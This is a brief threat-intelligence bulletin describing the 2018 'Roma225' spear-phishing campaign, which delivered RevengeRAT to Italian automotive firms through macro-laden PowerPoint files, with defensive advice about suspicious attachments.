The Enigmatic "Roma225" Campaign
(Dec 27, 2018)
Cybaze-Yoroi ZLab researchers identified a spear phishing email campaign targeting Italian automotive companies with the intent to infect victims with the "RevengeRAT" Remote Access Trojan (RAT). The campaign has been dubbed "Roma225" due to the repeated sequences of "roma225" strings found throughout the code to separate data fields. The phishing email pretended to be from a senior partner of a Brazilian law firm "Veirano Advogados," and contained a Microsoft PowerPoint attachment that requested macros to be enabled, if opened. If the macros are enabled, a "mshta.exe" tool runs and downloads the next stage of the malware dropper from a fake blog page. The blog page contains hidden VBScript code, that has the commands to download and install the RevengeRAT payload. RevengeRAT contacts the Command and Control (C2) server to relay the infected machine's information to the threat actors. At the time of this writing, it is unclear who is behind the attack and why they are targeting these specific organizations.
Recommendation: Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.